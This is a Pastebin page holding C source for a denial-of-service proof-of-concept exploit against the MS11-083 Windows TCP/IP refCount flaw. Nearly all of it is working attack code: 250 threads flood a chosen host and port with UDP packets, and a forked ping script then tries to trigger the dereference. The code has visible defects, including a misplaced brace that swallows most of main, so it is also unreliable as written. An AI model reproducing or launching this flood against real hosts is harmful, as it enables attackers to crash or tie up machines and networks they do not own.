API tools faq
paste
Advertisement
infodox

MS11-083 DoS/PoC exploit

infodox
Nov 30th, 2011
198
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.16 KB | None | 0 0
raw download clone embed print report
  1. /*
  2.  
  3. * MS11-083 DoS/PoC exploit
  4.  
  5. * ========================
  6.  
  7. * This attempts to trigger the ICMP refCount overflow  
  8.  
  9. * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
  10.  
  11. * requires sending 2^32 UDP packets to a host on a closed
  12.  
  13. * port, or 4,294,967,296 packets. A dereference function
  14.  
  15. * must be called that is not triggered via UDP but ICMP  
  16.  
  17. * echo packets. This exploit creates 250 threads and
  18.  
  19. * floods a host with UDP packets and then attempts to
  20.  
  21. * trigger the de-ref using ping. I calculated that it
  22.  
  23. * would take approximately 52 days for the host to
  24.  
  25. * enter a condition where this vulnerability is
  26.  
  27. * triggerable.
  28.  
  29. *
  30.  
  31. * -- prdelka
  32.  
  33. */
  34.  
  35. #include <stdio.h>
  36.  
  37. #include <stdlib.h>
  38.  
  39. #include <pthread.h>
  40.  
  41. #include <sys/types.h>
  42.  
  43. #include <sys/socket.h>
  44.  
  45. #include <netinet/in.h>
  46.  
  47. #include <arpa/inet.h>
  48.  
  49. #include <netdb.h>
  50.  
  51. #include <stdio.h>
  52.  
  53. #include <unistd.h>
  54.  
  55. #include <string.h>
  56.  
  57. #include <sys/time.h>
  58.  
  59.  
  60.  
  61.    
  62.  
  63. int port;
  64.  
  65. int active = 0;
  66.  
  67. pthread_mutex_t mutexactive;
  68.  
  69. void *sendpackets(void *ptr);
  70.  
  71.  
  72.  
  73.  
  74.  
  75. int  main(int argc, char *argv[]) {
  76.  
  77.         pthread_t thread;
  78.  
  79.         int iret,lthreads;
  80.  
  81.     pid_t pid;
  82.  
  83.     printf("[+] MS11-083 DoS/PoC exploit\n");
  84.  
  85.     if(argc<3){
  86.  
  87.         printf("[!] Usage : %s <server> <port>\n", argv[0]);
  88.  
  89.         exit(1);
  90.  
  91.  
  92.  
  93.     char *const args[] = {"ping",argv[1],NULL};
  94.  
  95.     char *const envp[] = {"",NULL};
  96.  
  97.     port = atoi(argv[2]);
  98.  
  99.     for(lthreads=0;lthreads<250;lthreads++){//UDP flood
  100.  
  101.         iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
  102.  
  103.         printf("[-] Thread number %d started\n",lthreads);
  104.  
  105.         sleep(1);
  106.  
  107.     }
  108.  
  109.     printf("[-] One does not simply barrel roll into Mordor\n");
  110.  
  111.     pid = fork();
  112.  
  113.     if(pid==0){// trigger deref.
  114.  
  115.         execve("./ping.sh",args,envp);
  116.  
  117.     };
  118.  
  119.     while(active){
  120.  
  121.     }
  122.  
  123.     printf("[-] You are finished. Patience is a virtue.\n");
  124.  
  125.     exit(0);
  126.  
  127. }
  128.  
  129.  
  130.  
  131. void *sendpackets(void *ptr)
  132.  
  133. {
  134.  
  135.     int sd, rc, n, echoLen, flags, error, timeOut;
  136.  
  137.     unsigned long i;
  138.  
  139.     struct sockaddr_in remoteServAddr;
  140.  
  141.     struct hostent *h;
  142.  
  143.     char str[41];
  144.  
  145.     pthread_mutex_lock(&mutexactive);
  146.  
  147.     active++;
  148.  
  149.     pthread_mutex_unlock(&mutexactive);
  150.  
  151.     srand(time(NULL));
  152.  
  153.     for (i = 0;i < 40;++i){
  154.  
  155.         str[i] = (char)((rand() % 78) + 30);
  156.  
  157.     }
  158.  
  159.     str[40] = '\0'; // yes this was off-by-one. :(
  160.  
  161.     printf("[-] Sending payload '%s'\n",str);
  162.  
  163.     h = gethostbyname(ptr);
  164.  
  165.     if(h==NULL) {
  166.  
  167.             printf("unknown host '%s' \n",(char*)ptr);
  168.  
  169.             exit(1);
  170.  
  171.     }
  172.  
  173.     remoteServAddr.sin_family = h->h_addrtype;
  174.  
  175.     memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
  176.  
  177.     remoteServAddr.sin_port = htons(port);
  178.  
  179.     sd = socket(AF_INET,SOCK_DGRAM,0);
  180.  
  181.     if(sd<0){
  182.  
  183.         printf("[!] Cannot open socket\n");
  184.  
  185.         pthread_exit((void*)0);
  186.  
  187.     }
  188.  
  189.     flags = 0;
  190.  
  191.     for(i=0;i<4294967295;i++){
  192.  
  193.         rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
  194.  
  195.         if(rc<0){
  196.  
  197.             printf("[!] Cannot send data\n");
  198.  
  199.                 close(sd);
  200.  
  201.             pthread_exit((void*)0);
  202.  
  203.             }
  204.  
  205.     }
  206.  
  207.     pthread_mutex_lock(&mutexactive);
  208.  
  209.     active--;
  210.  
  211.     pthread_mutex_unlock(&mutexactive);
  212.  
  213.     pthread_exit(NULL);
  214.  
  215. }
  216.  
  217. }
  218.  
  219.  
  220.  
  221.  
  222.  
  223.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!